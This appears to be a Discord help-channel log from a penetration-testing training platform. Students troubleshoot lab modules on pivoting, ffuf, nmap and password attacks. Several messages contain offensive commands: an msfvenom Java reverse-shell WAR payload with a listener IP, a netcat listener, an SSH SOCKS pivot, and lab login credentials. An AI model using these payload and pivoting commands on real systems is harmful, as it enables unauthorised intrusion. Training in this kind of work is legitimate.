i cant unlock modules
am I only one with this problem here
: )
can anyone tell me if this is the correct app for the skills assessment in ADVANCED XSS AND CSRF? I have had two different apps load at different times
Use the mutated password list
This module makes heavy use of the mutated list
Morning, bit lost on Pivoting, Tunneling, and Port Forwarding module Skills Assessment.
Stuck on last question in finding DC.
I'm in host ||PIVOTWIN10 Ip 172.16.6.25||.
I also see network ||172.16.10|| where I have two IPs ||172.16.10.5 ||and|| 172.16.10.25||. Can't connect to either of them. What am I missing?
Hi everyone, got a hashcat question here, hope I can get some help. I am trying to crack a hash with hashcat but I cannot cat the output file whatsoever. What am I doing wrong?
Hi, Trying to establish a rdp(xfreerdp) to foothold box. however, session keeps dropping.
[11:04:26:999] [3504:3505] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[11:04:26:999] [3504:3505] [ERROR][com.freerdp.core] - failed to connect to 10.129.204.126
Any solution please.
try to add /display-resolution in the end of your command like this xfreerdp /v:targetip /u:user /p:1231 /dynamic-resolution
Still getting the same error. (It's from the pwnbox)
reset target?
I'm experiencing the issue from yesterday. Did reset it. Will give it another go
tell me if that helped
Still getting the same error.
[11:23:50:788] [4281:4282] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[11:23:50:788] [4281:4282] [ERROR][com.freerdp.core] - failed to connect to 10.129.106.209
do you have privileges to RDP? also what command are you using
for sure it has to be the special characters on password
Yes. I have tried from there as well. the same error is thrown
Yes. xfreerdp
password has $ or ! use single quotes
Double quotes worked! hope the connection stays now.
Single quotes was throwing the error.
magic
double quotes with $ wont work.
That didn't last long enough. Dropped out again.
[11:30:46:666] [4398:4399] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[11:30:46:666] [4398:4399] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[11:30:46:666] [4398:4399] [INFO][com.freerdp.client.common] - Network disconnect!
fix your internet
True.
Just checked on that, there isn't any packet loss. 50 up and 20 down.
Can you add a bit more context as to what you've done near to pivoting on the pivot machine and how you're connecting to other hosts, also what error do you get.
did you try it with the resolution flag ?
Yes. i haven't taken it out
Internet is stable, as my VNC session doesn't drop. However, only the rdp session keeps dropping.
I create dynamic port forwarding on 1st host using ssh.
Then I RDP with ||mlefay ||on ||172.16.5.35||. Got creds for ||vfrank ||and next machine is ||172.16.5.35||.
From there I can see|| 172.16.10.x|| network.
I RDP directly to ||172.16.10.5|| and pivot via ||SocksOverRDP||. Host is not reachable.
Can somebody help me a little bit with Attacking Thick Client Application.Please
hey guys i m kind of stuck at shells and payloads modules live engagement host no. 1 i m not able to get reverse shell after uploading the shell and when accessing it , it throws 400, 404 error
Hi, Could you please provide the command used to establish the rdp connection to the foothold machine. It keeps dropping for me.
could you paste the command you use here ?
xfreerdp /v:10.129.106.209 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution
i used your command and got in directly without a prob and the connection is stable
try to use your own distro
I get the same error on my own distro as well. I shall try on a different network later.
maybe there is a vpn interfering ?
Yeah sure.
I don't use any 3rd party vpn
I shall try with a TCP vpn.
yeah thats most stable one prop
That made the connection stable.
Thanks @sly dome @unreal granite
np
hello
Hi
so I was looking through some of the pfSense documentation and stumbled upon the Lawrence Tech services's web page where they explain the recent change (a few months) features of pfSense CE and addition of pfSense Plus
https://forums.lawrencesystems.com/t/differences-in-pfsense-plus-vs-pfsense-ce-in-july-2023/18078
The key difference they have in this link, I understand some of the stuff they are comparing to but will it affect me in any way for which I would have to buy its plus package? Or should I shift to OPNsense which is a fork of pfSense.
I need someone to explain the key differences mentioned in this link so I can make a clear decision on what product I should stick to.
ffs I cant send the key message here
from Boot Environments to IPsec Export: Windows Powershell
hey guy, I'm stuck on "Attacking Thick Client Applications"
can some one please help?
damn okay
This has nothing to do with htb academy
Look up walk-through for the box "Fatty"
Its an out of syllabus question
Tell me when you figure out
Then it's not gonna get answered here read #welcome on how to access more of the server
@fathom pendant can you plz help me with shell and payloads modules live engagement section host1
@sly kelp
Is that the tomcat one? Creds are on the jump host desktop
???
Sorry it looks like it replied to the wrong thing
actually i am having problem with the payload access
@sly kelp
when i access it from the browser it throws the error 400
I don't think you need to include the .war extension in the url
okay let me try
If you go to tomcat manager you'll be able to click it to navigate to it as well
still not able to connect
Did you use the right arguments in msfvenom?
can i dm you the steps i took
i used msfvenom -p java/shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war
And that's the lhost ip of the jump host?
i didn't get what you are trying to ask
Is that 172 address the ip of the attack host?
yes
yes and also ran a listener with nc -lvp 443 -s 172.16.1.5
You don't need to specify the source
I dont recall it being that complicated once I accessed the page
And you're sure you're navigating to the right page for the file? Like I said the manager lets you go to it correctly
http://status.inlanefreight.local/files/shell the file i uploaded is shell.war
Shouldn't it be java/jsp_shell_reverse_tcp
I knew something didn't look quite right from your msfvenom command
When I put ffuf with -w and -u flags It returns me Errors : number (instead of 0) and it doesn't return the files
It would be nice to see your command my guy
Ok
So we can actually tell you what you did wrong
If you're trying to upload a photo, you can't. You need to link your htb main account to discord ( #welcome )
ffuf -w /opt/useful/Seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://94.237.54.59:39423/blog/indexFUZZ
It doesn't work in phone
Why aren't you doing index.fuzz
To retrieve all files that finish with .word
Like .html
.php
It's the module that show me this command
I didn't use it from my own knowledge
It's because the module says that we don't need to put it
I guess if that list already inserts the .
Ok
idk haven't messed with it much
It returns the same
try resetting the target and trying with the new IP:PORT
No

i didn't say it was due to time
Ok sorry
sometimes they just die and it's dumb
Ok
i deployed the payload from /manager still not able to get any response on listener
got it thanx
didn't find it, but I got it from the section, somehow ...
thanx
In addition to the pure exchange of information, SNMP also transmits control commands using agents over UDP port 161. The client can set specific values in the device and change options and settings with these commands. While in classical communication, it is always the client who actively requests information from the server, SNMP also enables the use of so-called traps over UDP port 162. These are data packets sent from the SNMP server to the client without being explicitly requested. If a device is configured accordingly, an SNMP trap is sent to the client once a specific event occurs on the server-side.
What are the traps it's talking about here?
Is it just a maliciously crafted packet?
trap just refers to it being empty
aka it looks correct but it's not
ok cool thanks
So in the Pivoting, tunneling and port forwarding module, the dynamic port forwarding with SSH and SOCKS Tunneling section, I keep getting the error || socket error or timeout!|| When trying to use proxychains
I do have the VPN on
It's eu-academy-1, if it's any relevant
What are you trying to do?
Which tool are you using? If you're using chisel, drop the chisel full command.
It's just proxychains
Maybe you're not forwarding the port correctly.
I'm using the command as taught in the module 🤷‍♂️
Wait let me see the module.
Are there any promo for black friday?
You are using ssh or msf?
SSH
Do like this :|| ssh -D 9050 ubuntu@10.129.202.64|| and add ||9050|| to your proxychains.
That I did, I'm gonna try changing the VPN server
Why aren't you doing index.fuzz
Your example you showed doesn't have the . between index and FUZZ
Welp that didn't do much
Gonna try pwnbox then
Hi everyone, I'm confused about a thing in the footprinting medium lab, I managed to obtain ||alex user and his password enumerating NFS then I connected to rpc and tried to obtain more information, but could not get anything, so I peeked at the forum and they were talking about MySQL and I have no idea how they got to an SQL database, I enumerated all ports and it had no entry for a SQL service, and again, could not find about it using alex's credentials, how should I know there is an SQL server running? ||
ps. I still have not completed the challenge
That worked
Let me go through my notes.
You are right there is no SQL service running. What other places do you think, can contain sensitive files from external perspective?
Module "ABUSING HTTP MISCONFIGURATIONS", "Common Session Variables (Account Takeover)" . Who can hint me to bypass MFA?
Thank you very much! I will explore more, got scared when I saw there was a MySQL running and got nothing about it
No worries.
I'm in the "Attacking Web Applications with Ffuf" module. Why does ffuf produce blank results?
This happens a lot to me.
It helps, when you add the module and section you're working on.
"Attacking Web Applications with Ffuf" Skills assessment
This has happened all through the module, the section doesn't matter.
I wasn't answering you
But anyway, maybe remove some filters and check then?
Or, according to the status 200 and blank results, it could just be, that's how the server responds to inexistent files, idk.
yes
hi so I've been stuck on the hard lab for Nmap for a few weeks. I went back and watched hackersploit's YouTube playlist on Nmap. However, I have been stuck on the hard lab for a long time. Its been at least three weeks. Would it be a bad idea at this point to watch a walkthrough of Enumeration with Nmap?
would it be worth it to watch most of the walkthrough but not the hard lab part or would it be a good idea at this point to watch entire walkthrough?
Well, I don't know anyone who's passed that's needed a walkthrough
Just cheating yourself
all the info to pass is in the section information
Ok. Is there a place where I can find a summary of everything before the hard lab that I have already completed to review and then try the hard lab again after reviewing that stuff? I think its because I have forgotten all of the information even tho I took notes.
its a lot of information is my thinking
Did anyone else have trouble during the "Pass the Hash" Module in "Password Attacks"? My RDP session keeps dying and is super slow. I'm stuck here for 2 days, because i cant work properly. Any tips?
maybe I could resolve the easy and medium labs?
lets say I did easy and medium labs again. would that help?
Yes its called your notes
no but I mean in different words.
use tcp for your vpn
Go back and review the content yourself if you haven't absorbed enough of the info yet
would redoing the easy and medium labs be a good idea?
then write your notes in different words
ok what about redoing easy and medium labs?
I dont think itd make a difference personally but may be a good idea for you
if your notes aren't helping, they're not good notes
Thanks i will try
isn't the hard lab a continuation of easy and medium labs?
like in terms of building upon it?
Eh
if you're missing the critical part to solve the lab then you'll still be missing the critical part to solve the lab
Redoing practice youre uncomfortable with always helps, but its not as likely to suddenly give you the insight you need
Yes
ok thanks
also just like experiment a lot
did you finish solving these?
Rote memorization wont help you much in these modules
Ive learned more by purposely experimenting and going off book or trying different ways to achieve the same result.
Figuring out WHY things dont work is just as valuable as figuring out what does work.
hi all, I am working on 'Getting Started' module under 'Public Exploits'. I am having difficulty finding the flag, I have successfully exploited the plug in. However, I am not sure what to do next/get the flag?
Worked like a charm
yes
I'm actually trying out the hard lab directly because I think as I research the nmap stuff I might eventually be able to solve it
so gonna keep trying
so after you exploited it what was the output?
wmiexec/psexec drops a shell, you don't need to set additional commands to get a rev shell
I don't know so I follow this :
it says it right there :)
the next step
idk if its considered a spoiler though maybe mark it as one
I checked the file that was saved...and did not find the /flag.txt anywhere
shoot, I just deleted it!
which section is that
Check the ip+port you used to generate the reverse shell
so it should be the contents of it that youre interested in
It is okay 172.16.1.10
PASSWORD ATTACKS
Pass the Hash (PtH)
the file is like 25 rows long?
Are you sure that's the ip of your listening host? From the example that looks like the ip of the dc.
yes ^^"
just did it and i got the flag. when you exploited it, which options did you set in msfconsole?
Yea you don't put the dc ip in the reverse shell command, you put the ip of the host that you run netcat to listen on
You tell the dc which ip to serve the shell
thanks
hi
i need help with beef
i want to send a link from my vm to my host
but i cant
Don't spam your question
hi I'm getting a little closer with the Network Enumeration with Nmap Module but I don't think this page is showing me the right answer but tell me if I'm on the right track:
┌─[us-academy-1]─[10.10.15.228]─[htb-ac-605555@htb-4cxzwormnp]─[~]
└──╼ [★]$ sudo nmap -sUV -p137-138 10.129.214.148
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-20 21:28 GMT
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 21:29 (0:00:37 remaining)
Stats: 0:01:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 21:30 (0:01:07 remaining)
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 21:31 (0:01:27 remaining)
Nmap scan report for 10.129.214.148
Host is up (0.072s latency).
PORT STATE SERVICE VERSION
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
Service Info: Host: NIX-NMAP-HARD
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.87 seconds
can someone help me out? am I on the right track?

